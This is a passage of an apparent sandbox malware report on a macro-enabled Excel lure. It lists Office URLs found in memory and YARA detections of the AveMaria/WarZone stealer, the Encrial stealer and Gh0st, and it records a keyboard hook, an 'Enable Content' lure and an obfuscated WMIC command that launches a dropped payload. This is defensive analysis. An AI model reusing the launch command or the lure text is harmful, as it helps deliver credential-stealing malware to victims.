        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://devnull.onenote.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://directory.services.
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
        Source: Test3.jpg, 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, Test3.jpg, 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
        Source: powershell.exe, 00000003.00000003.731177309.0000000004F95000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://graph.ppe.windows.net
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://graph.ppe.windows.net/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://graph.windows.net
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://graph.windows.net/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://incidents.diagnostics.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://lifecycle.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://login.microsoftonline.com/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://login.windows.local
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://management.azure.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://management.azure.com/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://messaging.office.com/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://ncus-000.contentsync.
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://officeapps.live.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://onedrive.live.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://outlook.office.com/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://outlook.office365.com/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://settings.outlook.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://staging.cortana.ai
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://store.office.com/addinstemplate
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
        Source: Test3.jpg, 00000013.00000002.948026637.0000000004080000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
        Source: Test3.jpg, 00000013.00000002.948026637.0000000004080000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://tasks.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://templatelogging.office.com/client/log
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://wus2-000.contentsync.
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://www.odwebp.svc.ms

        Key, Mouse, Clipboard, Microphone and Screen Capturing:

        Installs a global keyboard hook
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: Test3.jpg, 00000012.00000002.782831741.000000000069A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
        Source: Test3.jpg, 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp | Binary or memory string: GetRawInputData

        E-Banking Fraud:

        Yara detected AveMaria stealer
        Source: Yara match | File source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: AveMaria_WarZone Author: unknown
        Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: AveMaria_WarZone Author: unknown
        Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: AveMaria_WarZone Author: unknown
        Source: C:\Users\user\AppData\Local\Temp\Test1.txt, type: DROPPED | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, type: DROPPED | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 18.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 18.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 19.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
        Source: Screenshot number: 8 | Screenshot OCR: Enable Editing" form the yellow bar and then click 15 8 "Enable Content" 16 g 17 10 18 11 19 12
        Source: Screenshot number: 8 | Screenshot OCR: Enable Content X 5 Al - " jG: " : A B C D E F G I H I I I J I K 'T 8 1 9 2 :: : Qil D?'ument
        Source: Screenshot number: 12 | Screenshot OCR: Enable Editing" form the yellow bar and then click 15 8 "Enable Content" 16 g 17 10 18 11 19 12
        Source: Screenshot number: 12 | Screenshot OCR: Enable Content X 5 , Al - " jR " :' A B C I D I E, I F I G I H I I I J I K 'T 8 1 I 'k 9 2 ::
        Contains functionality to create processes via WMI
        Source: WMIC.exe, 00000011.00000002.766074537.0000000000860000.00000004.00000020.sdmp | Binary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\WMIC.exeWmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpgWmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpgWinSta0\DefaultGL
        Found Excel 4.0 Macro with suspicious formulas
        Source: Telex06012020.xls | Initial sample: EXEC
        Powershell drops PE file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Test1.txt
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 18_2_00424D1A NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,
        Source: Telex06012020.xls | OLE indicator, VBA macros: true
        Source: Joe Sandbox View | Dropped File: C:\Program Files\Microsoft DN1\sqlmap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
        Source: Test3.jpg.15.dr | Static PE information: Resource name: WM_DSP type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: mvqape5o.dll.10.dr | Static PE information: No import functions for PE file found
        Source: unknown | Driver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
        Source: Telex06012020.xls, type: SAMPLE | Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
        Source: Telex06012020.xls, type: SAMPLE | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000016.00000002.944604602.0000000005292000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000013.00000003.785520059.000000000062B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000013.00000002.946480583.0000000003465000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000003.00000003.759722473.00000000061E3000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000013.00000000.780781628.0000000000443000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000013.00000003.785553106.000000000062C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000003.00000003.739726186.000000000071D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000013.00000002.946136847.0000000002B8F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000012.00000000.764732381.0000000000443000.00000002.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
